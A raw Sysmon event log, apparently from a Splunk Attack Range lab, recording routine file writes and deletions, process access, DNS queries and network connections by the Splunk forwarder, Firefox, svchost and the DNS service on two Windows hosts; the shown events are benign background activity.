08:03:19.490{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=841647D5E981DD184F9517F28209446C,SHA256=416C853D7B5B40F41BF988D30CC09703C5EA2225CD1FB40F5B079960B085DCA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083682Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:19.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3657B62816095FF54366AACA3A0E30F9,SHA256=6403D1218019D6E89ACBA39983D947847903C516828125AB1DFD4F42D848B664,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108181Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:18.285{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51943-false10.0.1.12-8000- 10341000x8000000000000000108180Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:19.171{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-AE66-615A-BC00-00000000FC01}4464C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083681Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:19.056{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=57417BA8BF9B15C18BB6160390BD8B3B,SHA256=365E249DF2C701907F5478FA317AEFEF68E76801B7D50D277762C99B6412B4C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083683Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:20.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F44AC960E61686A43FB6D95AD8B6B09D,SHA256=F6257E14E53D487DC29061CCBF66177246B1044CE28E8C9CFA58B16F293B2719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108183Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:20.507{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63AD292652BABB0E65B47B6A741C5E63,SHA256=E240A2C16ABD25B9857799D5DEE04816EFB525E80508ED054C4A684781D41BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083687Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:21.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4FAC19C3E85620E6011A45D3A83F437,SHA256=DF25FCEBC16605AC34BB11837949129D5556EA68967B810FCEF6A9B45C9B8C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108190Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.691{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=FD93B921B398F3E6551410794DED9462,SHA256=7AD07DB2F58CD6A505415F48226709EEABFB96CAA97DF180CB6AE8E4214DA8EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108189Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.691{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=EF3A8A33A0F91A8CD52267734D972B3F,SHA256=CDCDDBF845F54EF302A24D43B15A3D7E9B489664E30B2D56FBDACF50735F0171,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108188Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.690{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=C3D2C26962EF6B732A4072CCBC668B26,SHA256=622FCE2C06998C27E2C9E062A72718CC9AAF291031AB2A5AA56BEB9F4F830554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108187Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.688{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=FB315C6E38E70118D5DE94025A096109,SHA256=07256883C7AD25EFC24999DD5AFC8942507ED6E6EB3715AB33FCECF5FA777E5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108186Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.687{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=42FCD9AB4D59E18224B6451895013816,SHA256=CAA33ECA553519B59E8573986BC602530793CC68C5F853E485DB357820765AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108185Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.686{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=EBC2F2295FA9FBF048D0A06ED298551F,SHA256=C56893F6FADA75AF1BF2F98A3D2C2E9133CCE3152A7D5BC9EB44C304D5B98645,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108184Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:21.522{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E98E448067F497AFCAC74ABFB7435F7F,SHA256=C86336B4A46966AD259218AE6235FA0CE1D46FD7BD52BE0650CDA8B1CD8F49DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083686Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:21.259{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083685Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:21.259{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083684Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:21.259{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1500-00000000FD01}1148C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108191Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:22.537{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D3A19586E5A4B1BA177DBBF55FA87D,SHA256=7A4C87CF788FFB7DD41A6DA0B59B791EE8DCFD8D11DC94D1993D86924DC6AC55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083688Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:22.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F858C5DFDDC00C53F0B4322E5E99E4,SHA256=4B3973C5C884D0C081BF975E23C58F2836752584DE7BB56A941D8B0AF22D421E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108192Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:23.552{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=954DEA3B7A3A37D80124E0211182D1FD,SHA256=5BB476628872EF3F5B68DFD427BDAD53AEEBE23004C0F4F9EBF68D96E7DF5B64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083690Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:23.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F29CAAA8EEA87E1D306A868EAC4DB5A5,SHA256=0FF06DB9F5CCD5A8F487F521D6383957CEEA5CF1C09651B96096D8604AFF5486,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083689Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:21.676{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50187-false10.0.1.12-8000- 23542300x800000000000000083691Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:24.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F6DA4D79C7BD99ACAEDC3E2ED43914D,SHA256=4A08F378491A4F8F6D9604C9616A735BFCB5E7823C91386AB4A8166DA2A88304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108196Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.621{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\7986MD5=C0206451BDA4738648529717C64B4D92,SHA256=AA514DB98FC0E98E5DEE0948EE104BA015CF26EC77BFE82D562D64678F5A523B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108195Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.568{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5DD8B978CF8BFCDC8B09F42802287D1,SHA256=14A02DC26A2EF852A3108EEA2C593A67F38CACD2C086E4E5AD20341CC7A2021E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108194Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.352{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\indexMD5=AB7142F7305013634C2E6756C06D6F36,SHA256=A3F22F1EC7C7672657B7267E6F5414A1CB40C8A6C088F935B81C1EA86DF20EC4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108193Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:23.413{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51944-false10.0.1.12-8000- 23542300x8000000000000000108198Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:25.621{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108197Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:25.568{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=766B7EE17B495574FED5B30C1BB2DF0F,SHA256=E6853E865BC28DCC130693210D17249435B5B043A75922A490157DD20C04D518,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083692Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:25.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAFA702C5CC704FAD35A2649C25A11A0,SHA256=13821189897100A15288C80E60F613020599463F221D0D7FAEF43C49A9828153,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108205Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.806{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58914- 354300x8000000000000000108204Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.806{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63737- 354300x8000000000000000108203Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.803{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58387- 354300x8000000000000000108202Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.634{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51946-false34.98.75.3636.75.98.34.bc.googleusercontent.com443https 354300x8000000000000000108201Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.612{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51945-false52.222.236.27server-52-222-236-27.fra56.r.cloudfront.net443https 354300x8000000000000000108200Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.612{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local62131- 23542300x8000000000000000108199Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:26.586{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8465CD00462DE08410D8D6443AADDE92,SHA256=5B5182C5AF38AF63980C72A0163DE6E7A58CF76691193BFFD65557EC41E78155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083693Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:26.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE779E8D98CF47BE1276F93380F921C,SHA256=28958ED756870C7B32A7228608DAEF140736E5E68CA42763671F831FE724F067,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000108210Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.817{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net02600:9000:225e:a200:a:da5e:7900:93a1;2600:9000:225e:4800:a:da5e:7900:93a1;2600:9000:225e:6c00:a:da5e:7900:93a1;2600:9000:225e:400:a:da5e:7900:93a1;2600:9000:225e:7200:a:da5e:7900:93a1;2600:9000:225e:6200:a:da5e:7900:93a1;2600:9000:225e:2400:a:da5e:7900:93a1;2600:9000:225e:8c00:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000108209Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.811{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net018.66.139.67;18.66.139.17;18.66.139.125;18.66.139.97;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000108208Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:27.604{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99E1922B4EBEE9EBF752CB80BADFBE77,SHA256=A2B313478526408B4E70AF946EE33BA27BF31E1C8E0D0B14974A6EC594ED76C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083694Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:27.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131B531CBC90B101A197B4363A5F2DDE,SHA256=83B4EC57414E4737AC9F01EC705C1744421105744C18B3F35A0960FCC7398893,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108207Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.835{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51948-false18.66.139.97-443https 354300x8000000000000000108206Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:24.823{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51947-false18.66.139.97-443https 23542300x8000000000000000108211Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:28.634{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82FA3CE5B6972EC656510DAFCCEDA271,SHA256=B0A3E6CB1C735270F4C1DF13382D0F1531A1ED04E2D6C260130F17668F8DA367,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083695Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:28.540{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61AE61CC5BA0A9099FF3665C8975BAA,SHA256=39BE43C8ABE9338EAB7E5E212D62D4648569564101DB2C8ADBA207969737A7DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108213Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:29.649{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF49EF061E938E2E1699EA3C4009360A,SHA256=D26DE9F79727FEACA30F09B48E8BEB74433CDD8D2DCD7CBD1CBF7A3E0CC65548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083697Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:29.900{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083696Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:29.540{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F46D1E5AF43B8BE77CEDD6524AE1F6E,SHA256=A174407FF727D519C15F554BAC5D85CBDF43D0159DE80204F527DFAB9DF54E96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108212Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:29.365{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\10455MD5=340ABCCB1D9F6ACDC5E5ED1F97383B84,SHA256=F4E3FF0E98C5BD65CB4555F4E543ED71DE138B1352551BD14E9749113AC3A3CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000108216Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:30.717{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\AlternateServices.txt2021-10-04 08:03:30.717 23542300x8000000000000000108215Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:30.664{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program 